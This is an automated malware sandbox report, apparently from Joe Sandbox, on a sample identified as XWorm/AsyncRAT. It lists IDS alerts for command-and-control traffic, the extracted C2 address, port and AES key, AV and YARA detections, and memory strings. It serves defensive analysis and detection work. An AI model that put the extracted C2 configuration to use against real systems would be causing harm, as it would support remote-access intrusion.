2024-11-29T15:21:00.787599+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:00.907672+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:01.027780+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:01.147964+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:01.268067+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:01.390386+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:01.512111+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:01.724011+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:01.923266+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:02.125543+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:02.246667+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:02.366715+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:02.608571+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:02.728572+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:02.848703+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:03.088530+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:03.208751+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:03.329282+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:03.449996+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:03.573360+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:03.814592+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:03.920478+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:04.040774+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:04.162284+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:04.290201+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:04.426020+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:04.596157+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:04.720026+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:05.030145+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:05.150189+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:05.270211+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:05.372291+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:05.492173+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:05.854165+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:05.975522+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:06.029420+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
2024-11-29T15:21:06.149596+0100 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 103.230.121.124 | 7000 | TCP
                      2024-11-29T15:21:06.269661+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.389848+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.510254+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.630516+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.712689+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.832827+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.952909+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:07.073227+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:07.193395+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:07.313717+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:07.420599+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:07.540909+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-29T15:20:23.932978+010028559241Malware Command and Control Activity Detected192.168.2.649884103.230.121.1247000TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-29T15:20:59.340612+010028531911Malware Command and Control Activity Detected103.230.121.1247000192.168.2.649884TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-29T15:20:58.593385+010028531921Malware Command and Control Activity Detected192.168.2.649884103.230.121.1247000TCP


                      AV Detection

Source: file.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\java.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: file.exe | Malware Configuration Extractor: Xworm {"C2 url": ["103.230.121.124"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: C:\Users\user\AppData\Roaming\java.exe | ReversingLabs: Detection: 81%
Source: file.exe | ReversingLabs: Detection: 81%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\java.exe | Joe Sandbox ML: detected
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | String decryptor: 103.230.121.124
Source: file.exe | String decryptor: 7000
Source: file.exe | String decryptor: <123456789>
Source: file.exe | String decryptor: <Xwormmm>
Source: file.exe | String decryptor: java
Source: file.exe | String decryptor: USB.exe
Source: file.exe | String decryptor: %AppData%
Source: file.exe | String decryptor: java.exe
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then jmp 00007FFD34824E27h | 0_2_00007FFD34824605
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then jmp 00007FFD34824E27h | 0_2_00007FFD34824605
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then jmp 00007FFD34823002h | 0_2_00007FFD34822E6C
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then jmp 00007FFD348241E4h | 0_2_00007FFD3481F6A0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then jmp 00007FFD348241F5h | 0_2_00007FFD3481F6A0

                      Networking

Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49884 -> 103.230.121.124:7000
Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 103.230.121.124:7000 -> 192.168.2.6:49884
Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49884 -> 103.230.121.124:7000
Source: Network traffic | Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 103.230.121.124:7000 -> 192.168.2.6:49884
Source: Network traffic | Suricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.6:49986 -> 103.230.121.124:7000
Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49986 -> 103.230.121.124:7000
Source: Network traffic | Suricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.6:49884 -> 103.230.121.124:7000
Source: Network traffic | Suricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 103.230.121.124:7000 -> 192.168.2.6:49884
Source: Malware configuration extractor | URLs: 103.230.121.124
Source: Yara match | File source: file.exe, type: SAMPLE
Source: Yara match | File source: 0.0.file.exe.630000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Roaming\java.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.6:49884 -> 103.230.121.124:7000
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View | ASN Name: VPSQUANUS VPSQUANUS
Source: unknown | DNS query: name: ip-api.com
Source: unknown | TCP traffic detected without corresponding DNS query: 103.230.121.124
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: powershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mEk
Source: powershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000010.00000002.2788544473.000001AA3FCE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mwrr
Source: svchost.exe, 0000000C.00000002.3404757837.0000014D50A00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: qmgr.db.12.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.12.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.12.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.12.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.12.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.12.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.12.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.12.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000010.00000002.2604852851.000001AA25B77000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.c
Source: powershell.exe, 00000010.00000002.2604852851.000001AA25B77000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.ctain
Source: file.exe, java.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000002.00000002.2215164794.000001A95E38F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2344886418.00000283B7450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2535136139.000001603D3E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2743903646.000001AA3758E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000010.00000002.2608646388.000001AA27748000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2188717626.000001A94E548000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2258347917.00000283A7608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2410917342.000001602D599000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2608646388.000001AA27748000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: file.exe, 00000000.00000002.3408817500.0000000002991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2188717626.000001A94E321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2258347917.00000283A73E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2410917342.000001602D371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2608646388.000001AA27521000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2188717626.000001A94E548000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2258347917.00000283A7608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2410917342.000001602D599000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2608646388.000001AA27748000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000010.00000002.2608646388.000001AA27748000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsof.
Source: powershell.exe, 0000000A.00000002.2565979792.0000016045A79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000002.00000002.2188717626.000001A94E321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2258347917.00000283A73E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2410917342.000001602D371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2608646388.000001AA27521000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000010.00000002.2743903646.000001AA3758E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000010.00000002.2743903646.000001AA3758E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000010.00000002.2743903646.000001AA3758E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: edb.log.12.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000000C.00000003.2419893569.0000014D507F0000.00000004.00000800.00020000.00000000.sdmp, edb.log.12.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000010.00000002.2608646388.000001AA27748000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2215164794.000001A95E38F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2344886418.00000283B7450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2535136139.000001603D3E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2743903646.000001AA3758E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.file.exe.ca0000.0.raw.unpack, RemoteDesktop.cs | .Net Code: GetScreen
Source: 0.2.file.exe.2a61cd8.1.raw.unpack, RemoteDesktop.cs | .Net Code: GetScreen

                      Operating System Destruction

Source: C:\Users\user\Desktop\file.exe | Process information set: 01 00 00 00

                      System Summary

Source: file.exe, type: SAMPLE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.file.exe.630000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.2125481379.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.3414135593.00000000129A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\java.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD34819469 | 0_2_00007FFD34819469
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD348160C6 | 0_2_00007FFD348160C6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD34824605 | 0_2_00007FFD34824605
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD34821A4A | 0_2_00007FFD34821A4A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD348112F8 | 0_2_00007FFD348112F8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD34811719 | 0_2_00007FFD34811719
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD34817272 | 0_2_00007FFD34817272
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD348113CD | 0_2_00007FFD348113CD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD348120F5 | 0_2_00007FFD348120F5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD3481108D | 0_2_00007FFD3481108D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34809EF3 | 2_2_00007FFD34809EF3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD3480947D | 2_2_00007FFD3480947D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34808E2C | 2_2_00007FFD34808E2C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34805EFA | 2_2_00007FFD34805EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD3480AB25 | 2_2_00007FFD3480AB25
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD3480B7DC | 2_2_00007FFD3480B7DC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFD347F71FB | 6_2_00007FFD347F71FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFD347F5BFA | 6_2_00007FFD347F5BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFD347F6FAD | 6_2_00007FFD347F6FAD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD34828503 | 10_2_00007FFD34828503
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD3482947D | 10_2_00007FFD3482947D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD34828E05 | 10_2_00007FFD34828E05
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFD348125ED | 16_2_00007FFD348125ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFD348189F2 | 16_2_00007FFD348189F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFD348135FA | 16_2_00007FFD348135FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFD348171FB | 16_2_00007FFD348171FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFD34815BFA | 16_2_00007FFD34815BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFD348E3330 | 16_2_00007FFD348E3330
Source: C:\Users\user\AppData\Roaming\java.exe | Code function: 20_2_00007FFD348112F8 | 20_2_00007FFD348112F8
Source: C:\Users\user\AppData\Roaming\java.exe | Code function: 20_2_00007FFD34811719 | 20_2_00007FFD34811719
Source: C:\Users\user\AppData\Roaming\java.exe | Code function: 20_2_00007FFD348120F5 | 20_2_00007FFD348120F5
Source: C:\Users\user\AppData\Roaming\java.exe | Code function: 20_2_00007FFD34811038 | 20_2_00007FFD34811038
Source: C:\Users\user\AppData\Roaming\java.exe | Code function: 21_2_00007FFD348012F8 | 21_2_00007FFD348012F8
Source: C:\Users\user\AppData\Roaming\java.exe | Code function: 21_2_00007FFD34801719 | 21_2_00007FFD34801719
Source: C:\Users\user\AppData\Roaming\java.exe | Code function: 21_2_00007FFD348020F5 | 21_2_00007FFD348020F5
Source: C:\Users\user\AppData\Roaming\java.exe | Code function: 21_2_00007FFD34801038 | 21_2_00007FFD34801038
Source: C:\Users\user\AppData\Roaming\java.exe | Code function: 22_2_00007FFD347F12F8 | 22_2_00007FFD347F12F8
Source: C:\Users\user\AppData\Roaming\java.exe | Code function: 22_2_00007FFD347F1719 | 22_2_00007FFD347F1719
Source: C:\Users\user\AppData\Roaming\java.exe | Code function: 22_2_00007FFD347F20F5 | 22_2_00007FFD347F20F5
Source: C:\Users\user\AppData\Roaming\java.exe | Code function: 22_2_00007FFD347F1038 | 22_2_00007FFD347F1038
Source: C:\Users\user\AppData\Roaming\java.exe | Code function: 23_2_00007FFD348012F8 | 23_2_00007FFD348012F8
Source: C:\Users\user\AppData\Roaming\java.exe | Code function: 23_2_00007FFD34801719 | 23_2_00007FFD34801719
Source: C:\Users\user\AppData\Roaming\java.exe | Code function: 23_2_00007FFD348020F5 | 23_2_00007FFD348020F5
Source: C:\Users\user\AppData\Roaming\java.exe | Code function: 23_2_00007FFD34801038 | 23_2_00007FFD34801038
Source: file.exe, 00000000.00000000.2125500166.0000000000644000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamejava.exe4 vs file.exe
Source: file.exe, 00000000.00000002.3407281886.0000000000CA0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRemoteDesktop.dll< vs file.exe
Source: file.exe, 00000000.00000002.3408817500.0000000002A5A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemoteDesktop.dll< vs file.exe
Source: file.exe, 00000000.00000002.3414135593.00000000129A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamejava.exe4 vs file.exe
Source: file.exe, 00000000.00000002.3408817500.0000000002A5F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemoteDesktop.dll< vs file.exe
Source: file.exe | Binary or memory string: OriginalFilenamejava.exe4 vs file.exe
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.file.exe.630000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.2125481379.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.3414135593.00000000129A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\java.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: file.exe, gGSik08LJTvBozHQW2rJNQsWdcNqnyZUe86p7yncuFlms6MojWQZlBOUXgyIdyiSbbkQtu.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: file.exe, gGSik08LJTvBozHQW2rJNQsWdcNqnyZUe86p7yncuFlms6MojWQZlBOUXgyIdyiSbbkQtu.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: file.exe, 775VniLT7bBOBCrgmDFH7fyve0dFdV6L3kiBaHDulpBhielIdxD38ipbQTK42LW6agwC07.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: java.exe.0.dr, gGSik08LJTvBozHQW2rJNQsWdcNqnyZUe86p7yncuFlms6MojWQZlBOUXgyIdyiSbbkQtu.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: java.exe.0.dr, gGSik08LJTvBozHQW2rJNQsWdcNqnyZUe86p7yncuFlms6MojWQZlBOUXgyIdyiSbbkQtu.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: java.exe.0.dr, 775VniLT7bBOBCrgmDFH7fyve0dFdV6L3kiBaHDulpBhielIdxD38ipbQTK42LW6agwC07.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.ca0000.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.ca0000.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.2a61cd8.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.2a61cd8.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: file.exe, l54gtFtLpKyOWZi2thKGa1BAbVNOqqAtAL11OEGAtZRsmPvwHpaf.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: file.exe, l54gtFtLpKyOWZi2thKGa1BAbVNOqqAtAL11OEGAtZRsmPvwHpaf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
